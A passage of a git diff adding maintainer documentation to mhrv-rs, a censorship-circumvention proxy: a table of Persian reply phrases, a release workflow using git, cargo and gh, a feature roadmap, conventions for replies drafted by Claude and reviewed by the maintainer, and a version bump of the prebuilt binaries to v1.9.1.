Drive یا setup OAuth)، یک VPN موقت ۱۰ دقیقه‌ای استفاده کنید + سپس به mhrv-rs برمی‌گردید. + +**نتیجه:** + +اگر می‌خواهید سایت‌های Google کار کنن با همان setup mhrv-rs که الان دارید، نیاز به Full mode + VPS + xray routing است. تا وقتی فقط apps_script mode دارید، Google services unreachable می‌مونن. + +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +## Common Persian phrases for inline use + +When writing custom replies, these phrases come up frequently and should be standardized: + +| Concept | Persian phrasing | +|---------|------------------| +| "redeploy as new version" | `redeploy as new version کنید (نه head)` | +| "exact match" | `دقیقاً match کنه` / `exact match` | +| "case-sensitive" | `case-sensitive است` | +| "ISP throttle" | `ISP throttle` (English term, transliterate not used) | +| "narrow down" | `narrow کنیم` | +| "share the log" | `log رو share کنید` | +| "thanks for the report" | `ممنون از گزارش` / `تشکر از گزارش` | +| "I owe you" / "apologies" | `معذرت می‌خوام بابت` | +| "for your specific case" | `برای case خاص شما` | +| "unfortunately" | `متأسفانه` | +| "the workaround is" | `workaround این هست که...` | +| "this is a known issue" | `این مشکل شناخته شده است` | +| "feature is queued" | `feature در roadmap است` | +| "we'll ship in v1.x.y" | `در v1.x.y ship می‌شه` | +| "configuration file" | `فایل config` | +| "command line" | `command line` / `terminal` / `ترمینال` | +| "deployment" (Apps Script) | `deployment` (transliterated `دپلوی` is not used in this project) | +| "tunnel" (Full mode) | `tunnel` | +| "browser" | `browser` / `مرورگر` | +| "system proxy" | `system proxy` | +| "page loads but X doesn't work" | `page بالا میاد ولی X کار نمی‌کنه` | +| "I tested with curl" | `با curl تست کردم` | +| "the bug is fixed in vX.Y.Z" | `bug در vX.Y.Z حل شده` | +| "thanks for catching this" | `ممنون از catch کردن این` | +| "let me know if it works" | `اگر کار کرد گزارش بدید` | +| "if it fails again, share the log" | `اگر دوباره fail کرد، log رو share کنید` | + +These let Persian replies use English technical terms naturally without forced transliteration, which matches how Iranian developers actually talk. diff --git a/docs/maintainer/references/release-workflow.md b/docs/maintainer/references/release-workflow.md new file mode 100644 index 00000000..7e5b0698 --- /dev/null +++ b/docs/maintainer/references/release-workflow.md @@ -0,0 +1,211 @@ +# Release workflow + +Cutting a release is fast and low-ceremony for this project. Most releases are patch bumps that go from "decision to ship" to "Telegram channel posting" in under 30 minutes of human work + ~30 minutes of CI. + +## When to cut a release + +Cut a release whenever **anything user-visible** has landed since the last tag. User-visible includes: + +- Bug fixes that affect runtime behavior +- New config options +- New CLI subcommands or flags +- Diagnostic improvements (better log messages, error categories) +- Apps Script script changes (Code.gs / CodeFull.gs) +- Documentation that users will read (README updates, troubleshooting docs — though these can also batch into the next release) + +Don't cut for: +- Internal refactors with no behavior change +- CI/workflow file edits +- Markdown formatting fixes +- Test-only changes + +When in doubt, cut. Patch releases are cheap and Iranian users actively check the Telegram channel for updates. + +## The release workflow + +### Step 1: Decide the version + +Read the latest tag: + +```bash +git describe --tags --abbrev=0 +``` + +Then bump: +- **Patch (Z+1)** — for ~95% of releases. v1.8.2 → v1.8.3 +- **Minor (Y+1)** — for a coherent feature batch shipped together. v1.7.x → v1.8.0 represented "DPI evasion + active-probing defense + full-mode usage counters" together +- **Major (X+1)** — never done in this project's history. Reserved for true protocol-incompatible changes with the Apps Script side. Don't bump major without explicit go-ahead. + +### Step 2: Bump `Cargo.toml` + +Edit `Cargo.toml` line 3 (`version = "X.Y.Z"`). Keep package name `mhrv-rs` unchanged. The `tunnel-node` subcrate has its own version that's independent — don't bump it unless you're shipping a tunnel-node change. + +### Step 3: Build to refresh `Cargo.lock` + +```bash +cargo build --release 2>&1 | tail -3 +``` + +`Cargo.lock` will pick up the new version string. Verify with: + +```bash +git diff Cargo.lock | head -20 +``` + +Should show only the `name = "mhrv-rs"` block's `version = "X.Y.Z"` change. + +### Step 4: Write the changelog + +Create `docs/changelog/vX.Y.Z.md` using the format in `assets/changelog-template.md`. Persian first, then `---`, then English. See `workflow-conventions.md` for format details. + +When the release is shipping multiple PRs from contributors, credit each by name + handle in both halves of the changelog. + +### Step 5: Run tests + final build + +```bash +cargo test --lib 2>&1 | tail -5 +cargo build --release 2>&1 | tail -3 +cargo build --bin mhrv-rs-ui --release --features ui 2>&1 | tail -3 +``` + +All three must succeed. Test count varies by version. All passing is the gate. + +If any contributor PRs were merged in this release, also verify by re-running tests after the merge — sometimes integration with main reveals issues that didn't show in the PR's CI. + +### Step 6: Commit + tag + push + +```bash +git add Cargo.toml Cargo.lock docs/changelog/vX.Y.Z.md +git status # sanity check +git commit -m "$(cat <<'EOF' +chore: vX.Y.Z — + + +EOF +)" + +git push origin main +git tag vX.Y.Z +git push origin vX.Y.Z +``` + +The `git push origin vX.Y.Z` is the trigger — release CI auto-fires on tag push. + +If `git push origin main` fails with `non-fast-forward`, someone (often the auto-binary-refresh CI from a prior release) pushed in the meantime: + +```bash +git pull --rebase origin main +git push origin main +git tag vX.Y.Z # if you didn't tag yet +git push origin vX.Y.Z +``` + +If you already tagged before the push race, the tag still works — it's pinned to your commit, and the rebase shouldn't change your commit's SHA unless there were conflicts. + +### Step 7: Watch CI + +```bash +gh run list --limit 3 +``` + +Two workflows fire on tag push: +1. **`release-drafter`** — quick (~15s), updates the GitHub release draft. Always succeeds. +2. **`release`** — slow (~25-35 minutes), builds binaries for all platforms, attaches to release. + +Once `release` succeeds, a third workflow auto-fires: +3. **`Telegram publish release files`** — posts each binary individually to the Telegram channel `mhrv_rs` with Persian captions, SHA-256 hashes, and a cross-link from the main channel. Takes ~1-2 minutes. + +If `release` fails, common causes: + +- **Cross-compile failure** — particularly on i686 / mipsel. i686 was dropped from the matrix in v1.7.11 because of MSRV churn (see #411 thread). If a new architecture starts failing, it's usually a transitive dep bumping MSRV past what the toolchain pinned for that target supports. Triage: check which architecture's job failed, look at the cargo error, decide whether to pin a dep with `cargo update --precise` or drop the architecture. +- **`actions/download-artifact@v4` flakiness** — replaced with `gh run download` + 3-attempt retry in v1.7.11. Should be stable now; if it flakes again, increase retry count. + +After CI succeeds, optionally check the binary refresh: + +```bash +git pull origin main +git log --oneline -3 +``` + +You should see an auto-generated commit `chore(releases): refresh prebuilt binaries for vX.Y.Z` from the release CI bot. + +### Step 8: Verify Telegram channel + +The Telegram publish workflow posts to channel `mhrv_rs` (public link `https://t.me/mhrv_rs`). The channel should show: + +1. An announcement post: `📦 mhrv-rs vX.Y.Z منتشر شد...` referencing the changelog file +2. ~16 individual file posts (Android APKs split by ABI, Windows ZIP, macOS arm64/amd64 dmg+tar, Linux x86_64/arm64 incl. musl, Raspbian, OpenWRT) +3. Each file caption includes Persian description (e.g., "نسخه ویندوز x86") + SHA-256 hash +4. A "main channel" post (different channel) cross-linking to the files channel post + +Files larger than 50 MB get chunked into `.part_aa`, `.part_ab`, etc. via the `split` pattern in `.github/scripts/telegram_publish_files.py`. + +If something didn't post, check the workflow run logs: + +```bash +gh run view --log +``` + +Common cause: the auto-fire dispatch on `workflow_run` requires the parent workflow to succeed; if release.yml had a flaky download retry, the dispatch might still succeed but partial. + +## Manual re-publish (rare) + +If you need to re-trigger Telegram publishing for an already-released version (e.g., the workflow failed and you fixed it), use `workflow_dispatch`: + +```bash +gh workflow run "Telegram publish release files" -f version=vX.Y.Z +``` + +The script downloads artifacts via `gh release download` (not the workflow's artifacts) so it works retroactively. + +## Re-cutting a release (very rare) + +If a release was tagged and pushed but turns out to be broken (e.g., bug in a merged PR you wanted to revert): + +1. **Don't** delete the tag if the release is already public. Iranian users may have already pulled the binaries; a deleted tag confuses them and they think the project is gone. +2. Cut a fix immediately as the next patch (vX.Y.Z+1). +3. Optionally edit the GitHub release notes for the broken version to say "known issue, upgrade to vX.Y.Z+1". + +If you tagged but didn't push yet, just delete the tag locally and re-tag after fixing: + +```bash +git tag -d vX.Y.Z # local only; safe +# fix the issue, commit +git tag vX.Y.Z +git push origin vX.Y.Z +``` + +## Pre-release rollback + +If `cargo test --lib` fails after merging PRs but before tagging: + +1. Don't tag. +2. Either revert the merge commit (`git revert `) or fix forward (commit a new fix on main). +3. Re-run tests until green. +4. Tag. + +The release CI doesn't run tests before building, so untagged-but-broken main is fine — you have time to fix before tagging. + +## Coordinating with multiple PRs in flight + +If two PRs are both ready to merge, the order matters: + +- Merge them one at a time (not both into a single tag) **only** if they're independent +- If they touch the same files, merge them sequentially with `gh pr checkout N1 && cargo test && merge`, then `gh pr checkout N2` (which now bases on the new main; CI on the PR may show the old base, but the local checkout sees latest main) `&& cargo test && merge` +- If a merge introduces conflicts, GitHub's UI flags the PR as conflicting; resolve via `gh pr checkout N` + manual rebase + push to the PR branch + +After all PRs are merged, **then** bump version, write changelog (covering all merged PRs), tag, push. + +## Versioning the tunnel-node subcrate + +`tunnel-node/Cargo.toml` has its own version field separate from the main crate. Bump it when: + +- Changing the tunnel-node HTTP API (`/tunnel`, `/batch` endpoints) +- Changing the auth flow (`TUNNEL_AUTH_KEY` semantics) +- Changing the env var contract +- Bumping the Docker image label + +For pure internal refactors of tunnel-node that don't change the surface, leave it alone — the Docker image at `ghcr.io/therealaleph/mhrv-tunnel-node:latest` continues to be the latest tag and users don't need to know an internal version bumped. + +When tunnel-node version bumps, the Docker image gets re-tagged in the registry by the CI. Users running `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:latest` get the new version automatically; users pinned to a specific version stay pinned. diff --git a/docs/maintainer/references/roadmap.md b/docs/maintainer/references/roadmap.md new file mode 100644 index 00000000..5a1482bd --- /dev/null +++ b/docs/maintainer/references/roadmap.md @@ -0,0 +1,118 @@ +# Roadmap + +This is the project's queued work, organized by release batch. Use it when: +- Categorizing a new feature request from a user (which batch does this fit?) +- Cross-referencing roadmap items in your replies ("queued for v1.8.x") +- Deciding what to ship in the current batch vs deferred + +Update this file when items ship (move to "shipped") or when new items are added (cluster with similar items in the right batch). + +## v1.8.x (current batch — small fixes + diagnostics + Android UI) + +The v1.8.x line is a **small-and-frequent** release pattern. Each release ships one or two completed items rather than batching many. The theme is "diagnostic improvements + Android UX + Apps Script script enhancements". + +### Shipped + +- ✅ **v1.8.0**: Random padding (DPI evasion), auto-blacklist deployments, decoy responses, full-mode usage counters, active-probing defense, DIAGNOSTIC_MODE flag in Code.gs +- ✅ **v1.8.1**: Decoy detection client-side (with v1.8.2/v1.8.3 corrections), `script_id` in error logs, `disable_padding` config flag +- ✅ **v1.8.2**: UI binary tracing reads `config.log_level` (with reload handle for live changes), softer 4-cause decoy detection error message +- ✅ **v1.8.3**: Spreadsheet-backed response cache (Code.gs, opt-in), DoH bypass for known DoH endpoints, H1 container keepalive (240s), 64 KB header cap with HTTP 431, clearer port-collision error message + +### Queued (small, can ship in next 1-3 patch releases) + +- **v1.8.4 candidate items**: + - Soften decoy detection further with the 6-cause taxonomy (Persian quota body + Workspace landing HTML detection) + - Per-`script_id` rolling-window error-category counter visible in CLI/UI + - run.bat auto-fallback to CLI when both UI renderers fail (#417 / #426) + - TUNNEL_AUTH_KEY startup warning when `MHRV_AUTH_KEY` is set without `TUNNEL_AUTH_KEY` (catches the recurring #391-style env var typo) + - Range-aware splicing in Code.gs (lets large downloads work via HTTP Range requests, partial fix for #441) + +### Queued (medium-effort, batch into focused release) + +- **`googlevideo_ip` config field** (#300) — separate `google_ip` for googlevideo.com vs other Google domains. Some users have one IP that works for the latter but not the former. Approx 1-2 days of work. +- **DNS ad-blocking via StevenBlack/hosts** (#377) — opt-in DNS-level filtering during SOCKS5/MITM dispatch. Reduces upstream calls for ad-domains. +- **DNS caching + parallel dispatch via hickory-resolver** (#377) — replace blocking DNS with cached + parallel resolver. Substantial latency win for browser pageloads. +- **Tunable strike-counter threshold for auto-blacklist** (#391) — single-deployment users currently hit the auto-blacklist after a few transient errors and end up with no working deployment. Make threshold configurable. +- **`block_quic` 3-state UI toggle** (#361 / #377): off / drop / reject (default reject = ICMP unreachable, instant Happy Eyeballs failover). 2bemoji's design. +- **Android UI batch** (#285 / #361 / #261 / #295 / #254 / #313 / #375): + - block_quic toggle + - youtube_via_relay toggle + - listen_host editor + - passthrough_hosts editor + - Active deployment indicator + - Per-deployment quota counters + - Android disconnect crash fix (#418) +- **System proxy toggle** (#432) — Windows/macOS/Linux desktop UI: on Connect set system HTTP proxy to mhrv-rs, on Disconnect clear. With crash-rollback so a hung mhrv-rs doesn't leave system proxy stuck. +- **`script_ids_url` dynamic config** (#433) — config field pointing at an HTTPS URL that returns a JSON list of deployment IDs. mhrv-rs fetches at startup + every TTL. Lets distributors update deployment lists for many users without each editing config manually. +- **In-app updater via mhrv-rs's own proxy** (#366) — let mhrv-rs check for updates + download new binaries through its own relay (avoiding the chicken-and-egg of "I can't reach github.com to update mhrv-rs"). Defense in depth. +- **Temporal jitter** (#369 §2) — randomize timing of batch dispatches to defeat timing-correlation DPI. +- **`tls_verify` config** (#430 / masterking32 PR #26) — opt-in to skip upstream TLS verification for self-signed certs. Trade-off: opens MITM-of-MITM risk; needs careful design. +- **`request_timeout` configurable** (#430 / masterking32 PR #25) — currently hard-coded `BATCH_TIMEOUT = 30s`. Make configurable for users on slow networks who want longer timeouts. +- **CF Workers backend audit** (#380 / #393) — test mhr-cfw compatibility. If it works, document as alternative backend. + +### Documentation queued + +- **`docs/full-mode-google-bypass.md`** (#420) — dual-routing in xray for users with Iranian VPS xray entry topology +- **`docs/full-mode-iran-vps-setup.md`** (#420) — full step-by-step for the dual-VPS topology (Iranian xray entry + non-Iranian tunnel-node exit) +- **`docs/iran-mirrors.md`** (#422) — community-maintained Iranian CDN mirrors for users who can't reach github.com. Pending SHA-256 verification of @amintoorchi's xdevteam.liara.space mirrors. +- **`docs/win7-build.md`** (#411) — manual Cargo.lock downgrade + cargo update --precise chain for community Win7 32-bit builds. Officially unsupported since v1.7.11 but the build path works for technical users. +- **`docs/faq/android.md`** — user trust store explanation, which apps work, why Gmail/YouTube don't, root + Magisk option +- **Updates to README** — short explanation of dual-routing for Google services + xray config snippet + +## v1.9.0 (headline release — xmux) + +The v1.9.0 release is the **xmux** feature: stream splitting across multiple Apps Script deployments at byte-range level. Currently in design / RFC stage (#369). + +### Design goals + +- **Survivability under ISP RST** — when one deployment's TCP connection gets RST-injected mid-stream, other deployments continue to carry remaining byte ranges +- **Latency reduction** — small responses can hit any of N deployments first; mhrv-rs takes the first to respond +- **Bandwidth aggregation** — large downloads chunk across deployments concurrently. 5 deployments × 10 MB/s each ≈ 50 MB/s aggregate (subject to per-deployment caps) +- **SABR cliff mitigation** — long YouTube streams chunk into <30s windows across deployments; each window finishes within Apps Script's response cap, then mhrv-rs reassembles + +### Open design questions + +- **Reordering buffer size** — bigger = more memory; smaller = more retries on out-of-order +- **Failure recovery** — if a deployment fails mid-chunk, who picks up the half-served range? +- **Idempotency** — POST requests are tricky; current design only handles GET safely +- **State consistency** — if some chunks come from cache and some don't, ETag/Last-Modified handling needs care +- **Configurability** — when does a user want xmux on (latency-sensitive) vs off (quota-sensitive)? + +### Implementation timeline + +- 4-6 weeks of design + implementation +- Tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers when design issue is filed + +The design issue should be filed after the v1.8.x batch settles (so the queue isn't too long). + +## v1.9.x and beyond (longer-horizon) + +These are committed to the project's roadmap but not actively in design. Listed for traceability when users ask "are you planning X?". + +- **Cloudflare WARP integration** (#309) — outbound traffic exits via Cloudflare WARP after Apps Script. Lets sites that flag Google IPs (most CF-protected) see traffic as Cloudflare-residential. Feasibility uncertain — needs CF account + WARP wireguard interface integration. +- **TLS fingerprint randomization** (#369 §2) — randomize JA3/JA4 across deployments. Defeats CF / commercial bot detection. +- **tunnel-node UPSTREAM_SOCKS5 chain** (#333 kanan-droid) — let tunnel-node forward through a SOCKS5 upstream (e.g., another VPN). Defense in depth + IP variety. +- **Tier-3 i686-win7-windows-msvc target** (#411) — Windows 7 32-bit support via tier-3 target with `-Z build-std`. Needs nightly Rust. Roadmap v1.9.x or v2.x. +- **Web frontend / dashboard** (#384) — landing page for the project. Low priority but recurring request. +- **In-app changelog viewer** — show changelog for new version inside mhrv-rs UI when an update is available (small UX polish). + +## How to use this when triaging issues + +When a feature request comes in: + +1. Match the request to an existing item in this list. If found, reply: "Queued for v1.8.x [or whichever batch]. ETA ~X weeks. See [#NNN](#) for the canonical thread." +2. If it's a duplicate of an existing roadmap item, close as duplicate of the canonical issue. +3. If it's a new request not on this list: + - Substantive feature: add to v1.8.x or v1.9.x list as appropriate, note the issue number, reply with the planned bucket + - Long-horizon / uncertain: add to v1.9.x and beyond, reply that it's noted but no timeline + - Architectural impossibility (UrlFetchApp self-loop, MTProto, etc.): close with explanation, link to architectural reference + +## Roadmap velocity + +The project ships v1.x.y patches frequently — typically 1-3 per week during active development. Minor (1.x) bumps happen every few months. v1.0 → v1.8 took ~12 months. So: + +- "v1.8.x ETA" usually means "next 1-2 weeks" for small items, "next 1-2 months" for big items +- "v1.9.0 ETA" usually means "next 2-3 months" +- "v1.9.x" or "v2.x" means "no specific timeline, but committed to consider" + +Be honest with users about timelines. Iranian users especially appreciate knowing whether to wait or pursue alternatives. diff --git a/docs/maintainer/references/workflow-conventions.md b/docs/maintainer/references/workflow-conventions.md new file mode 100644 index 00000000..f3c3ba89 --- /dev/null +++ b/docs/maintainer/references/workflow-conventions.md @@ -0,0 +1,174 @@ +# Workflow conventions + +These are the writing conventions, formatting rules, and tone guidelines for everything that goes into the public repo or out to users. Internalize these — they're applied to every issue reply, every commit message, every changelog, every PR description. + +## The reply marker + +Every substantive issue or PR comment ends with this exact footer: + +``` +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +That's a literal Markdown horizontal rule, then the `...` line. The `[reply via Anthropic Claude | reviewed by @therealaleph]` text is verbatim — same brackets, same pipe, same case, same `@therealaleph` mention. + +**Why this exists**: replies are drafted by Claude and reviewed by the maintainer before posting. The marker signals this to the user. Users in this community know this convention and rely on it. + +**Don't omit it**, don't translate "reviewed by" into Persian, don't paraphrase the format. The marker stays the same regardless of whether the rest of the reply is in Persian or English. + +**Where it doesn't go**: very short comments like "Dup of #423." or "Closing as resolved." or close-comments via `gh issue close --comment "..."`. The marker is for substantive replies. Trivial close comments don't need it. + +## Persian or English: match the user + +The repo's userbase is majority Persian-speaking. Writing in their language matters — both for clarity (technical context lands better) and for respect (assuming everyone wants English is wrong). + +**Match what the user wrote**: +- User wrote in Persian → reply in Persian +- User wrote in English → reply in English +- User wrote a mix → match the dominant language; if it's roughly even, prefer Persian since most mixed-language Iranian users default to Persian for nuance and English for technical terms + +**Things that always stay in original Latin form**, regardless of reply language: +- Code blocks (Rust, JSON, bash, JS — all stay as-is) +- Command-line examples (`gh issue close N`, `cargo build`, `docker run ...`) +- Technical identifiers: `AUTH_KEY`, `TUNNEL_AUTH_KEY`, `script_id`, `parallel_concurrency`, `disable_padding`, `tunnel_doh`, `bypass_doh_hosts`, `DIAGNOSTIC_MODE`, `passthrough_hosts`, `google_ip`, `mode: "full"` / `mode: "apps_script"` +- Filename references: `Code.gs`, `CodeFull.gs`, `config.json`, `tunnel-node`, `mhrv-rs.exe`, `MhrvVpnService.kt`, `domain_fronter.rs` +- URLs and links +- The reply marker +- Issue references like `#404`, `#313` +- HTTP status codes (`502`, `504`, `403`) + +**Don't**: +- Translate command names or function names +- Mix Persian text into code blocks (unless user did so in their own paste) +- Use machine-translation for the Persian — write it natively + +**Persian register**: write at "polite professional" level — `می‌فرمایید` over `می‌گی`, `لطفاً` (please), full pronouns when needed. Iranian Github users tend to write fairly formally; match that. Use Persian punctuation conventions: `،` (Persian comma), `؛` (Persian semicolon), `؟` (Persian question mark) — though comma in lists is acceptable as `،` or `,` per style preference. + +## Public artifact tone + +Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Iranian users especially read carefully and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient. + +## Changelog format + +Every release has a file at `docs/changelog/vX.Y.Z.md`. The format is strict: + +```markdown + +• [bullet 1 in Persian, with markdown links to issue numbers] +• [bullet 2 in Persian] +• [bullet 3 in Persian] +--- +• [same bullet 1 in English, written natively, not machine-translated] +• [same bullet 2 in English] +• [same bullet 3 in English] +``` + +Conventions: + +- **Use `•` (U+2022 bullet)**, not `-` or `*`. The Persian half uses bullets because Markdown unordered lists don't render naturally with Persian RTL text in the GitHub Releases page. +- **Issue/PR links**: full GitHub URLs in markdown form: `[#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)`. Don't use bare `#404` in changelogs — they don't auto-link in the Persian section. +- **Same content both halves** — they cover the same bullets, in the same order. Not necessarily verbatim translation; the Persian is written for Persian readers and may use slightly different framing. +- **Length**: each bullet should describe what changed AND why it matters. "Added DoH bypass" is too thin; "DoH lookups now route around the Apps Script tunnel via plain TCP, saving the ~2s UrlFetchApp roundtrip per name without losing privacy (DoH is already encrypted)" is the right depth. +- **Credit contributors**: if a PR landed from a community contributor, say so by name + handle. Persian: `از @euvel`. English: `by @euvel`. +- **Backwards-incompatible changes**: rare for this project, but flag prominently if any. Add `**شکستگی سازگار**` / `**Breaking change**` prefix. + +The starter template is at `assets/changelog-template.md`. + +## Commit messages + +Format: + +``` +: vX.Y.Z — + + + +[optional: bullet list of specific changes] +``` + +Types in regular use: +- `feat:` — new feature, user-visible (most common) +- `fix:` — bug fix +- `chore(releases):` — auto-fired CI commit refreshing prebuilt binaries +- `chore:` — version bump, dep update, etc. +- `docs:` — documentation-only changes +- `ci(workflow-name):` — workflow file changes +- `feat(area):` — feature scoped to a specific subsystem (e.g., `feat(code.gs):`, `feat(drive):`) + +Example commit message: + +``` +feat: v1.8.3 — sheet cache + DoH bypass + H1 keepalive + 431 + clearer errors + +Three substantive PRs from contributors landed for this release: + +- #443 by @euvel: optional spreadsheet-backed response cache in Code.gs. + Implements all 5 review suggestions from the design discussion (#400): + TTL-aware caching, 35 KB body-size gate, header rewriting on hit, + circular buffer for O(1) writes, Vary-aware compound keys. + +- #439 by @dazzling-no-more: bypass Apps Script tunnel for known DoH + endpoints on TCP/443. Cloudflare/Google/Quad9/AdGuard/NextDNS/OpenDNS/ + ... +``` + +Conventions: +- **Subject line under 75 chars** (GitHub truncates longer) +- **Body wrapped at ~75-80 chars** for terminal-readability +- **PR-merge commits**: when merging PRs via `gh pr merge --merge`, use `--subject` and `--body` to write the merge commit. Format is the same — type prefix, short summary, body explaining what shipped and credit. + +## Issue close reasons + +Always pass `--reason`: + +- `--reason completed` — the user's problem was resolved (their fix worked, or our fix shipped + they confirmed). For close comments, brief acknowledgement is fine; full marker not required. +- `--reason "not planned"` — duplicate, architectural limit, won't-fix, or stale and unrecoverable. Always link to the canonical thread when closing as duplicate. + +For close comments, always include the destination issue if duplicate: + +``` +gh issue close N --reason "not planned" --comment "Closing as duplicate of #420 — full discussion + workarounds there." +``` + +## File names for reply markdown + +Convention: write reply markdown to a temp file (e.g., `/tmp/r--.md`) before posting via `gh issue comment N --body-file `. + +Examples: +- `/tmp/r-404-quota.md` — reply to #404 about a quota observation +- `/tmp/r-414-decoy.md` — reply to #414 about the decoy body +- `/tmp/r-pr-merged.md` — generic "merged + included in vX.Y.Z" PR thank-you reply + +**Why use files instead of inline `--body`**: the inline `--body` argument runs through the shell, which interprets backticks (\`code\`) and `$()` substitutions. Issue replies frequently contain bash command examples with these patterns. The file approach sidesteps the quoting hell entirely. Use it by default. + +The exception is very short replies like `Dup of #423.` — those can use `--body "Dup of #423."` directly. + +## Tone + +- **Warm but technical**. Iranian users in particular often write apologetically ("sorry for using AI for the translation", "sorry to bother") — answer them as you'd want to be answered: with care, with technical depth, with explicit acknowledgment that their report is valuable. +- **Don't promise fixes you can't deliver**. The Iran ISP throttle is not something the project can fix; saying "we're working on it" is OK, "we'll fix it next release" is not. +- **Don't pretend certainty**. v1.8.1's over-confident "AUTH_KEY mismatch" message in the decoy detection cost trust with reporters who turned out to be hitting one of the other candidate causes. v1.8.2 + v1.8.3 are explicitly less assertive ("could be one of the following four/six causes...") because being honest about uncertainty is the better long-term move. +- **Acknowledge community contributions liberally**. When a contributor's report shaped a roadmap item, say so by name. When a PR lands, thank them in the merge commit + PR comment + changelog. The project runs on goodwill. +- **Don't apologize excessively** but do correct yourself when wrong. Iterating publicly through wrong hypotheses to a correct one is fine; doubling down on a wrong assertion is not. + +## Persian translation specifics + +When writing Persian replies: + +- **Half-spaces (ZWNJ — `‌`)** in compound words: `می‌خواهم` (not `میخواهم` or `می خواهم`), `نمی‌توانم` (not `نمیتوانم`) +- **Persian numerals**: optional but common in formal writing — `۲۰،۰۰۰` instead of `20,000`. Code/commands always Latin numerals. +- **English technical terms in Persian text**: leave them in Latin script with surrounding Persian particles. Example: `از طریق Apps Script روی Google` (not transliterated) +- **Quotation marks**: Persian uses `«...»` rather than `"..."` for prose. Code/commands use `"..."` regardless. +- **The reply marker stays in English** as established. Don't translate `reviewed by` to Persian. + +## DOPR cycle structure + +When triaging a batch of issues/PRs, work through them in this order: + +1. **Read everything first** — list PRs, list recently-updated issues, scan headlines. Don't reply to issue 1 before knowing what issues 2-15 contain. Often there are clusters that should be addressed together (e.g., five users all hit the v1.8.0 decoy on the same day). +2. **Triage by pattern** — match each issue to a pattern from `issue-patterns.md`. Issues that match a pattern get pattern-canonical replies (with specifics drawn from the user's actual log lines). Issues that don't match a pattern get individual attention. +3. **Substantive PRs first** — if a PR has tests passing and looks mergeable, merge it. Then your subsequent issue replies can reference "shipped in vX.Y.Z" instead of "queued for next release". +4. **Reply in batches but not as templates** — write each reply to address that user's specific log lines, config quirks, or terminology. Templated replies are easy to spot and erode trust. +5. **Close cleanly** — if an issue was a duplicate, close at the end of your reply with the close-comment pointing to canonical thread. If it's awaiting user verification, leave open with last comment from you. +6. **Cut releases when work lands** — don't accumulate fixes across multiple work sessions. Each session that lands user-visible code → one tag → one release. diff --git a/releases/README.md b/releases/README.md index d96ede6c..8ac0e1fa 100644 --- a/releases/README.md +++ b/releases/README.md @@ -2,11 +2,11 @@ This folder contains the prebuilt binaries from the latest release, committed directly to the repository for users who cannot reach the GitHub Releases page. -Current version: **v1.1.0** +Current version: **v1.9.1** | File | Platform | Contents | |---|---|---| -| `mhrv-rs-android-universal-v1.1.0.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file | +| `mhrv-rs-android-universal-v1.9.1.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file | | `mhrv-rs-linux-amd64.tar.gz` | Linux x86_64 | `mhrv-rs`, `mhrv-rs-ui`, `run.sh` | | `mhrv-rs-linux-arm64.tar.gz` | Linux aarch64 | `mhrv-rs`, `run.sh` (CLI only) | | `mhrv-rs-raspbian-armhf.tar.gz` | Raspberry Pi / ARMv7 hardfloat | `mhrv-rs`, `run.sh` (CLI only) | @@ -45,7 +45,7 @@ Extract `mhrv-rs-windows-amd64.zip`, then double-click `run.bat` inside the extr ### Android -Copy `mhrv-rs-android-universal-v1.1.0.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester). +Copy `mhrv-rs-android-universal-v1.9.1.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester). See the [main README](../README.md) for desktop setup (Apps Script deployment, config, browser proxy settings). @@ -55,7 +55,7 @@ See the [main README](../README.md) for desktop setup (Apps Script deployment, c این پوشه شامل فایل‌های آخرین نسخه است و مستقیماً در ریپو قرار گرفته برای کاربرانی که به صفحهٔ GitHub Releases دسترسی ندارند. -نسخهٔ فعلی: **v1.1.0** +نسخهٔ فعلی: **v1.9.1** ### دانلود از طریق ZIP @@ -73,6 +73,6 @@ cd mhrv-rs-macos-arm64 **ویندوز:** فایل `mhrv-rs-windows-amd64.zip` را extract کنید و داخل پوشه روی `run.bat` دو بار کلیک کنید (UAC را قبول کنید تا گواهی MITM نصب شود). -**اندروید:** فایل `mhrv-rs-android-universal-v1.1.0.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست. +**اندروید:** فایل `mhrv-rs-android-universal-v1.9.1.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست. برای راه‌اندازی کامل دسکتاپ (دیپلوی Apps Script، config، تنظیم proxy مرورگر) به [README اصلی](../README.md) مراجعه کنید. diff --git a/releases/mhrv-rs-android-arm64-v8a-v1.9.1.apk b/releases/mhrv-rs-android-arm64-v8a-v1.9.1.apk new file mode 100644 index 00000000..2127aadd Binary files /dev/null and b/releases/mhrv-rs-android-arm64-v8a-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-armeabi-v7a-v1.9.1.apk b/releases/mhrv-rs-android-armeabi-v7a-v1.9.1.apk new file mode 100644 index 00000000..94d79a65 Binary files /dev/null and b/releases/mhrv-rs-android-armeabi-v7a-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-universal-v1.1.0.apk b/releases/mhrv-rs-android-universal-v1.9.1.apk similarity index 79% rename from releases/mhrv-rs-android-universal-v1.1.0.apk rename to 